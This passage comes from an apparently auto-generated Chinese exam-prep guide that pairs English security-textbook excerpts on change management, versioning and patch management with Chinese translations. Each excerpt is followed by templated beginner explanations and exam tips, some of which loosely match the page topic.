随后部署到网络内的系统中。 自动化 将图像与其他自动化方法结合用于基线配置是很常见的。 换句话说,管理员可 以为组织内的所有台式计算机创建一个统一的镜像,然后使用自动化方法为特 定的计算机组添加额外的应用程序、功能或设置。 例如,某个部门的计算机可 能通过脚本或其他自动化工具应用额外的安全设置或应用程序。 Microsoft 的操作系统包含组策略。 管理员只需配置一次组策略设置,即可自 动将该设置应用到域中的所有计算机。 其他组策略设置可以配置为应用于特定 组的所有计算机,例如所有文件服务器或会计部门的所有计算机。 为某些 Windows 系统修改注册表正变得越来越普遍。 例如,攻击者经常使用 PowerShell 进行攻击性攻击。 第 14 章讨论了 PowerShell 在权限提升攻击中 的应用。 通过修改某些注册表设置,管理员可以限制这些攻击的有效性,并在 攻击开始时检测到它们。 一些设置可阻止攻击者访问 PowerShell,而其他设 置则启用额外的日志记录,以便管理员了解攻击者如何使用 PowerShell。 管 理员可以通过操作组策略设置来修改相应的注册表设置。 管理变更 以安全状态部署系统是一个良好的开端。

然而,确保系统保持相同的安全级 别也同样重要。 变更管理有助于减少由未经授权的变更引起的意外中断。 变更管理的主要目标是确保变更不会导致中断。 变更管理流程确保在实施 前由相关人员审查和批准变更,并确保相关人员对变更进行测试和记录。 更改通常会产生意外的副作用,可能导致服务中断。 例如,管理员可能更改一个 系统以解决某个问题,但却不知情地导致其他系统出现问题。 请参阅图 16.3。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 31 / PDF P1117

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

web server is accessible from the Internet and accesses the database on the internal network. Administrators have configured appropriate ports on Firewall 1 to allow internet traffic to the web server and appropriate ports on Firewall 2 to allow the web server to access the database server. FIGURE 16.3 Web server and database server A well-meaning firewall administrator may see an unrecognized open port on Firewall 2 and decide to close it in the interest of security. Unfortunately, the web server needs this port open to communicate with the database server, so when the port is closed, the web server will begin having problems.

The help desk is soon flooded with requests to fix the web server, and people begin troubleshooting it. They ask the web server programmers for help, and after some troubleshooting, the developers realize that the database server isn't answering queries. They then call in the database administrators to troubleshoot the database server. After a bunch of hooting, hollering, blamestorming, and finger-pointing, someone realizes that a needed port on Firewall 2 is closed. They open the port and resolve the problem—at least until this well-meaning firewall administrator closes it again or starts tinkering with Firewall 1. Web

中文直译 / 整理

服务器可从互联网访问,并访问内部网络上的数据库。 管理员已在防火 墙 1 上配置了适当的端口,以允许互联网流量访问 Web 服务器,并在防火墙 2 上配置了适当的端口,以允许 Web 服务器访问数据库服务器。 图16.3 Web server and database server 一位好心的防火墙管理员可能在防火墙2上发现一个未识别的开放端口,并出 于安全考虑决定将其关闭。 不幸的是,Web服务器需要此端口保持开放,以便 与数据库服务器通信,因此当端口被关闭时,Web服务器将开始出现问题。 帮 助台很快收到大量修复Web服务器的请求,人们开始排查问题。 他们向 Web服务器程序员寻求帮助,经过一些排查后,开发人员发现数据库服务器没 有响应查询。 于是他们联系数据库管理员来排查数据库服务器。 经过一番喧闹、 指责和相互推诿后,有人终于意识到防火墙2上一个必要的端口被关闭了。 他 们打开该端口,解决了问题——至少在那位好心的防火墙管理员再次关闭它或 开始摆弄防火墙1之前是这样。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
学习单元 32 / PDF P1118

五大支柱与 CIA 三元组

先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

教材原文段落

Organizations constantly seek the best balance between security and usability. There are instances when an organization makes conscious decisions to improve the performance or usability of a system by weakening security. However, change management helps ensure that an organization takes the time to evaluate the risk of weakening security and compare it to the benefits of increased usability. Unauthorized changes directly affect the A in the CIA Triad—availability. However, change management processes allow various IT experts to review proposed changes for unintended side effects before implementing the changes.

These processes also give administrators time to check their work in controlled environments before implementing changes in production environments. Additionally, some changes can weaken or reduce security. Imagine an organization isn't using an effective access control model to grant access to users. Administrators may not be able to keep up with the requests for additional access. Frustrated administrators may decide to add a group of users to an Administrators group within the network. Users will now have all the access they need, improving their ability to use the network, and they will no longer bother the administrators with access requests.

However, granting administrator access in this way directly violates the least privilege principle and significantly weakens security. Many of the configuration and change management concepts in use today are derived from ITIL (formally an acronym for Information Technology Infrastructure Library) documents originally published by the United Kingdom. Even though many of the concepts come from ITIL, organizations don't need to adopt ITIL to implement change and configuration management. Change Management A change management process ensures that personnel can perform a security impact analysis. Experts evaluate changes to identify any security impacts

中文直译 / 整理

组织不断寻求安全与可用性之间的最佳平衡。 有时,组织会主动做出决 策,通过降低安全性来提升系统性能或可用性。 然而,变更管理有助于确保 组织有足够的时间评估降低安全性的风险,并将其与提升可用性的收益进行 比较。 未经授权的更改会直接影响CIA三元组中的A——可用性。 然而,变更管理流程 允许各种IT专家在实施更改前审查拟议更改的意外副作用。 这些流程还为管理 员提供了时间,以便在生产环境实施更改前在受控环境中检查其工作。 此外,某些更改可能会削弱或降低安全性。 想象一下,一个组织没有使用有效 的访问控制模型来授予用户访问权限。 管理员可能无法跟上对额外访问权限的 请求。 沮丧的管理员可能会决定将一组用户添加到网络中的管理员组。 用户现 在将拥有他们所需的所有访问权限,从而提高了他们使用网络的能力,并且不 再频繁向管理员提出访问请求。 然而,以这种方式授予管理员权限直接违反了 最小特权原则,并显著削弱了安全性。 如今许多配置和变更管理概念源自英国最初发布的ITIL(原为 Information Technology Infrastructure Library的缩写)文档。

尽管 许多概念源自ITIL,但组织在实施变更和配置管理时无需采用ITIL。 变更管理 变更管理流程确保人员能够执行安全影响分析。 专家评估变更以识别任何安全影响

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

CIA 三元组:机密性、完整性、可用性是安全目标的三根主梁。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“五大支柱与 CIA 三元组”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

泄露看机密性,篡改看完整性,中断/不可访问看可用性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
CIA 三元组 机密性、完整性、可用性是安全目标的三根主梁。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 33 / PDF P1119

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

before personnel deploy the changes in a production environment. Change management controls provide a process to control, document, track, and audit all system changes. This includes changes to any aspect of a system, including hardware and software configuration. Organizations implement change management processes through the life cycle of any system. Common tasks within a change management process are as follows: 1. Request the change. Once personnel identify desired changes, they request the change. Some organizations use internal websites, allowing personnel to submit change requests via a web page.

The website automatically logs the request in a database, which allows personnel to track the changes. It also allows anyone to see the status of a change request. 2. Review the change. Experts within the organization review the change. Personnel reviewing a change are typically from several different areas within the organization. In some cases, they may quickly complete the review and approve or reject the change. In other cases, the change may require approval at a formal change review board or change advisory board (CAB) after extensive testing. Board members are the personnel who review the change request. 3. Approve/reject the change.

Based on the review, these experts then approve or reject the change. They also record the response in the change management documentation. For example, if the organization uses an internal website, someone will document the results in the website's database. In some cases, the change review board might require the creation of a rollback or backout plan. This ensures that personnel can return the system to its original condition if the change results in a failure. 4. Test the change. Once the change is approved, it should be tested, preferably on a nonproduction server. Testing helps verify that the change doesn't cause an unanticipated problem. 5. Schedule and implement the change.

The change is scheduled so that it can be implemented with the least impact on the system and the system's customer(s). This may require scheduling the change during off-duty or nonpeak hours. Testing should discover any problems, but it's still possible that the change causes unforeseen problems. Because of

中文直译 / 整理

在人员将变更部署到生产环境之前。 变更管理控制提供了一种流程,用于控制、记录、跟踪和审计所有系统变更。 这包括对系统任何方面的变更,如硬件和软件配置。 组织在系统的整个生命周 期中实施变更管理流程。 变更管理过程中的常见任务如下: 1. 提出变更。 一旦人员识别出所需的变更,他们就会提出变更请求。 一些 组织使用内部网站,允许人员通过网页提交变更请求。 网站会自动将请求 记录在数据库中,使人员能够跟踪变更情况,同时也允许任何人查看变更 请求的状态。 2. 审查变更。 组织内的专家对变更进行审查。 审查变更的人员通常来自组 织内的多个不同部门。 在某些情况下,他们可以快速完成审查并批准或拒 绝变更。 在其他情况下,变更可能需要经过广泛测试后,由正式的变更评 审委员会或变更咨询委员会(CAB)批准。 委员会成员即为审查变更请求 的人员。 3. 批准/拒绝变更。 根据审查结果,这些专家随后批准或拒绝变更,并将响应 记录在变更管理文档中。 例如,如果组织使用内部网站,某人会将结果记录 在网站的数据库中。 在某些情况下,变更评审委员会可能要求制定回滚或撤 回计划。 这确保了在变更导致失败时,人员能够将系统恢复到原始状态。

4. 测试变更。 变更获得批准后,应进行测试,最好在非生产服务器上 进行。 测试有助于验证变更不会引发意外问题。 5. 安排并实施变更。 变更的安排应尽量减少对系统及其客户的影响。 这可能 需要在非工作时间或非高峰时段安排变更。 测试应能发现任何问题,但仍有 可能变更引发未预见的问题。 由于

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

审计:审计检查控制是否存在、是否有效、是否符合要求。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

ISO 偏标准和管理体系。

审计题关注独立性、证据、范围和报告。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 34 / PDF P1120

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

this, it's important to have a rollback plan. This allows personnel to undo the change and return the system to its previous state if necessary. 6. Document the change. The last step is the documentation of the change to ensure that all interested parties are aware of it. This step often requires a change in the configuration management documentation. If an unrelated disaster requires administrators to rebuild the system, the change management documentation provides them with information on the change. This ensures that they can return the system to the state it was in before the change. There may be instances when an emergency change is required.

For example, if an attack or malware infection takes one or more systems down, an administrator may need to make changes to a system or network to contain the incident. In this situation, the administrator still needs to document the changes. This ensures that the change review board can review the change for potential problems. Additionally, documenting the emergency change ensures that the affected system(s) will include the new configuration if it needs to be rebuilt. When the change management process is enforced, it creates documentation for all changes to a system. This provides a trail of information if personnel need to reverse the change.

If personnel need to implement the same change on other systems, the documentation also provides a roadmap or procedure to follow. Change management control is a mandatory element for some security assurance requirements (SARs) in the ISO Common Criteria. However, change management controls are implemented in many organizations that don't require compliance with ISO Common Criteria. It improves the security of an environment by protecting against unauthorized changes that result in unintentional losses. Versioning Versioning typically refers to version control used in software configuration management.

A labeling or numbering system differentiates between different software sets and configurations across multiple machines or at different points in time on a single machine. For example, the first version of an application may be labeled as 1.0. The first minor update would be labeled

中文直译 / 整理

这一点很重要,必须制定回滚计划。 这样,如果需要,工作人员可以撤销变更 并将系统恢复到先前状态。 6. 记录变更。 最后一步是记录变更,以确保所有相关方都了解该变更。 此步 骤通常需要更新配置管理文档。 如果发生无关的灾难导致管理员需要重建系 统,变更管理文档将为他们提供有关变更的信息,从而确保他们能够将系统 恢复到变更前的状态。 在某些情况下可能需要进行紧急变更。 例如,如果攻击或恶意软件感染导致一 个或多个系统宕机,管理员可能需要对系统或网络进行更改以控制事件。 在这 种情况下,管理员仍需记录这些变更,以确保变更审查委员会能够审查变更是 否存在潜在问题。 此外,记录紧急变更可确保在系统需要重建时,受影响的系 统将包含新的配置。 当变更管理流程得到执行时,它会为系统的所有变更创建文档。 如果人员需要 撤销变更,这些文档可提供追溯信息; 如果人员需要在其他系统上实施相同的 变更,这些文档也能提供相应的操作指南或流程。 变更管理控制是ISO通用准则中某些安全保证要求(SARs)的强制性要素。 然 而,许多不需要遵守ISO通用准则的组织也实施了变更管理控制。 它通过防止 导致非故意损失的未授权变更来提高环境的安全性。

版本控制 版本控制通常指软件配置管理中使用的版本控制。 一种标记或编号系统用于区 分不同机器上或单台机器在不同时刻的不同软件集和配置。 例如,应用程序的 第一个版本可能被标记为 1.0。 第一个小版本更新将被标记

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

指南:指南是建议做法,不一定强制。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Recommended、not compulsory 常对应 guideline。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 35 / PDF P1121

第 1121 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

as 1.1, and the first major update would be 2.0. This helps keep track of changes over time to deployed software. Although most established software developers recognize the importance of versioning and revision control with applications, many new web developers don't recognize its importance. These web developers have learned some excellent skills they use to create awesome websites, but don't always recognize the importance of underlying principles such as versioning control. If they don't control changes through some type of versioning control system, they can implement a change that effectively breaks the website.

Configuration Documentation Configuration documentation identifies the current configuration of systems. It identifies who is responsible for the system and its purpose and lists all changes applied to the baseline. Years ago, many organizations used simple paper notebooks to record this information for servers, but it is much more common to store this information in files or databases today. Of course, the challenge with storing the documentation in a data file is that it can be inaccessible during an outage. Manage Patches and Reduce Vulnerabilities Patch and vulnerability management processes work together to help protect an organization against emerging threats.

Bugs and security vulnerabilities are routinely discovered in operating systems and applications. As they are discovered, vendors write and test patches to remove the vulnerabilities. Patch management ensures that appropriate patches are applied, and vulnerability management helps verify that systems are not vulnerable to known threats. Systems to Manage It's worth stressing that patch and vulnerability management doesn't only apply to workstations and servers—it also applies to any computing device with an operating system.

Network infrastructure systems such as routers, switches, firewalls, appliances (such as a unified threat management appliance), and printers all include some type of operating system. Some are Cisco-based, others are Microsoft-based, and others are Linux-based.

中文直译 / 整理

为 1.1,而第一个大版本更新则为 2.0。 这有助于跟踪已部署软件随时间的 变化。 尽管大多数经验丰富的软件开发人员都认识到版本控制和修订控制对应用程序 的重要性,但许多新的网页开发人员并未意识到其重要性。 这些网页开发人员 掌握了一些优秀的技能,用于创建出色的网站,但并不总是认识到版本控制等 基本原理的重要性。 如果他们不通过某种版本控制系统来控制更改,就可能实 施一个会直接导致网站崩溃的更改。 配置文档 配置文档用于标识系统的当前配置,明确系统负责人及其用途,并列出所有应 用于基线的变更。 多年前,许多组织使用简单的纸质笔记本记录服务器的此类 信息,但如今更常见的是将这些信息存储在文件或数据库中。 当然,将文档存 储在数据文件中的挑战在于,在系统中断期间可能无法访问这些文档。 管理补丁并减少漏洞 补丁和漏洞管理流程协同工作,以帮助组织抵御新兴威胁。 操作系统和应用程 序中的漏洞和安全缺陷会定期被发现。 一旦发现,供应商会编写并测试补丁以 消除这些漏洞。 补丁管理确保应用适当的补丁,而漏洞管理则有助于验证系统 是否不受已知威胁的影响。

管理系统 需要强调的是,补丁和漏洞管理不仅适用于工作站和服务器——还适用于任何 带有操作系统的计算设备。 网络基础设施系统,如路由器、交换机、防火墙、 设备(例如统一威胁管理设备)和打印机,都包含某种类型的操作系统。 有些 基于Cisco,有些基于Microsoft,有些基于Linux。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1121 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 36 / PDF P1122

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Embedded systems are any devices that have a CPU, that run an operating system, and that have one or more applications designed to perform one or more functions. Examples include camera systems, smart televisions, household appliances (such as burglar alarm systems, wireless thermostats, and refrigerators), automobiles, medical devices, and more. These devices are sometimes referred to as the Internet of Things (IoT). These devices may have vulnerabilities requiring patches. For example, the massive distributed denial-of-service (DDoS) attack on Domain Name System (DNS) servers in late 2016 effectively took down the Internet by preventing users from accessing dozens of websites.

Attackers reportedly used the Mirai malware to take control of IoT devices (such as Internet Protocol [IP] cameras, baby monitors, and printers) and join them to a botnet. Tens of millions of devices sent DNS lookup requests to DNS servers, effectively overloading them. Obviously, these devices should be patched to prevent a repeat of this attack, but many manufacturers, organizations, and owners don't patch IoT devices. Worse, many vendors don't even release patches. Finally, if an organization allows employees to use mobile devices (such as smartphones and tablets) within the organizational network, these mobile devices should be managed. MDM software can deploy patches to mobile devices.

Patch Management A patch is a blanket term for any type of code written to correct a bug or vulnerability or to improve existing software performance. The software can be either an operating system or an application. Patches are sometimes referred to as updates, quick fixes, and hot fixes. In the context of security, administrators are primarily concerned with security patches, which are patches that affect a system's vulnerability. Even though vendors regularly write and release patches, these patches are useful only if they are applied. This may seem obvious, but many security incidents occur simply because organizations don't implement a patch management policy.

As an example, one attack in May 2017 exploited a vulnerability in an Apache Struts web application that could have been patched in March 2017. An effective patch management program ensures that systems are kept up-todate with current patches. These are the common steps within an effective patch management program:

中文直译 / 整理

嵌入式系统是指任何具有CPU、运行操作系统并设计有一个或多个应用程序以 执行一个或多个功能的设备。 示例包括摄像系统、智能电视、家用电器(例如 防盗报警系统、无线恒温器和冰箱)、汽车、医疗设备等。 这些设备有时被称 为物联网(IoT)。 这些设备可能存在需要修补的漏洞。 例如,2016年底针对域名系统(DNS)服 务器的大规模分布式拒绝服务(DDoS)攻击,通过阻止用户访问数十个网站, 导致互联网大面积瘫痪。 据称,攻击者利用Mirai恶意软件控制了物联网设备 (如互联网协议 [IP]摄像头、婴儿监视器和打印机),并将它们纳入僵尸网络。 数千万台设备向DNS服务器发送DNS查找请求,从而使其超载。 显然,应修补 这些设备以防止此类攻击再次发生,但许多制造商、组织和用户并未修补物联 网设备。 更糟糕的是,许多厂商甚至不发布补丁。 最后,如果组织允许员工在组织网络内使用移动设备(如智能手机和平板电 脑),则应对这些移动设备进行管理。 MDM软件可以向移动设备部署补丁。 补丁管理 补丁是一个统称,指用于修复错误或漏洞或提升现有软件性能的任何类型代 码。 该软件可以是操作系统或应用程序。 补丁有时被称为更新、快速修复和 热修复。

在安全背景下,管理员主要关注安全补丁,即影响系统漏洞的补丁。 尽管供应商定期编写和发布补丁,但这些补丁只有在应用后才有效。 这看似 显而易见,但许多安全事件的发生仅仅是因为组织没有实施补丁管理策略。 例如,2017年5月的一次攻击利用了Apache Struts Web应用程序中的一个 漏洞,而该漏洞本可以在2017年3月被修补。 一个有效的补丁管理计划可确保系统保持最新的补丁。 一个有效的补丁管理计 划通常包括以下步骤:

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 37 / PDF P1123

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

Evaluate patches. When vendors announce or release patches, administrators evaluate them to determine if they apply to their systems. For example, a patch released to fix a vulnerability on a Unix system configured as a Domain Name System (DNS) server is not relevant for a server running DNS on Windows. Similarly, a patch released to fix a feature running on a Windows system is not needed if the feature is not installed. Test patches. Whenever possible, administrators test patches on an isolated nonproduction system to determine if the patch causes any unwanted side effects. The worst-case scenario is that a system will no longer start after applying a patch.

For example, patches have occasionally caused systems to begin an endless reboot cycle. They boot into a stop error and keep trying to reboot to recover from the error. If testing shows this on a single system, it affects only one system. However, if an organization applies the patch to a thousand computers before testing it, it could have catastrophic results. Smaller organizations often choose not to evaluate, test, and approve patches but instead use an automatic method to approve and deploy the patches. Windows systems include Windows Update, which makes this easy. However, larger organizations usually take control of the process to prevent potential outages from updates.

Approve the patches. After administrators test the patches and determine them to be safe, they approve the patches for deployment. It's common to use a change management process (described earlier in this chapter) as part of the approval process. Deploy the patches. After testing and approval, administrators deploy the patches. Many organizations use automated methods to deploy the patches. These can be third-party products or products provided by the software vendor. Verify that patches are deployed. After deploying patches, administrators regularly test and audit systems to ensure that they remain patched. Many deployment tools include the ability to audit systems.

Additionally, many vulnerability assessment tools include the ability to check systems to ensure that they have appropriate patches.

中文直译 / 整理

